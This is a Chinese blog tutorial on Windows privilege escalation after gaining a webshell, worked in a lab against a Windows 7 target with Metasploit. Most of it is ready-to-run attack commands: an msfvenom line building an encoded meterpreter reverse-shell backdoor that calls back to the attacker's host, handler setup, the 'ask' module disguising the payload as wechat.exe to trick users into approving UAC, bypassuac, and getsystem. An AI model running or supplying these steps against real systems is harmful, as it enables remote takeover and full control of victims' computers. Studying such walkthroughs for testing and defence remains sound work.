后渗透 - windows权限提升

作者: nohands_noob | 来源:发表于2019-12-28 21:14 被阅读0次

当我们获得一个网站的webshell后该如何提升权限呢?这里就针对windows来试试使用Metasploit提升权限

kali的ip:192.168.83.100
靶机 x86 win7 ip :192.168.83.33
假如我们已经拿到了靶机的webshell

我们先利用msfvenom生成一个后门,名字为msf.exe

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.83.100 LPORT=6666 -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe

参数解释:

--platform:平台
-p:payload
LHOST:监听主机(kali的ip)
LPORT:监听端口
-b:去除坏字符
-e:使用的编码
-f:生成文件格式

将生成的exe文件利用webshell管理工具上传到服务器
打开msfconsole
使用模块 exploit/multi/handler
执行use exploit/multi/handler
设置参数
set lhost 192.168.83.100
set lport 6666
set payload windows/meterpreter/reverse_tcp

执行
exploit

利用webshell执行上传的文件
然后msf获得了会话,session的id为4

当获得了session后,有两种情况

一种是你是欧皇,上来就是system权限 另一种情况你是非酋,不是system权限

然后你就要考虑怎么提权了

使用命令background将sessions放入后台
使用ask模块进行提权,使用该模块提权有个大问题,就是会触发uac机制

use exploit/windows/local/ask 

设置参数
set filename wechat.exe  #伪装应用
set session 5  #设置session的id,我id 4有system权限,现在将id 5提权

开始攻击
exploit

然后靶机就触发了uac....,emmmm骗骗傻子应该可以,只要他点了是,msf就会开启一个新的session,在新会话中使用getsystem命令后,再使用getuid查看就成为了system权限

使用bypassuac模块提权,该模块的好处是不会触发uac机制,但是需要靶机连接session的用户在admins组

use exploit/windows/local/bypassuac
set session 5
exploit
利用系统漏洞提权

关于session后台运行后怎么重新进入session:sessions -i [id]
删除session:session -k [id]

相关文章

  • 后渗透 - windows权限提升

    当我们获得一个网站的webshell后该如何提升权限呢?这里就针对windows来试试使用Metasploit提升...

  • 后渗透-msf下Windows的信息收集

    上篇文章《后渗透 - windows权限提升》中说到了msf反弹sessions和提权的方法,这次记录下一些msf...

  • 怎么查看Chrome浏览器中保存的密码

    前言 在后渗透阶段,获得权限后需要搜集目标系统的信息。信息越全面,越有助于进一步的渗透。对于Windows系统,用...

  • 【提权系列】— CVE-2017-0213

    漏洞名称 Windows COM 权限提升漏洞 漏洞编号 CVE-2017-0213 漏洞描述 Windows C...

  • 后渗透阶段总结(提权+信息收集+内外渗透+后门)

    竟然是后渗透了 前期先搞个上个马吧,这两天总结的一些,渗透比开发好玩啊哈哈哈~ 1: 权限提升:提权 (1)win...

  • 后渗透之权限维持

    前言 在getshell后,往往因为内网渗透的需要不得不长时间对目标进行持续威胁(简称APT)。因此需要进行权限维...

  • 学习链接

    91Ri.org_我的安全攻防指南 网络安全 渗透技巧 跨站攻击 代码审计 权限提升 内网渗透 脚本漏洞 无线安全...

  • 后渗透之windows后门

    前言 之前写过一篇《后渗透之权限维持》,但在实战中可用性不强。本着简单、方便的原则重新总结了一下,但是隐蔽性也不是...

  • 网络安全必学渗透测试流程

    这个靶场是一个对渗透新手很友好的靶场。而且,该靶场包含了渗透测试的信息收集,漏洞利用和权限提升的全过程,对新手理解...

  • 2019-08-08

    pr提权 提权利用的漏洞 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没...

网友评论

    本文标题:后渗透 - windows权限提升

    本文链接:https://www.haomeiwen.com/subject/ubzsoctx.html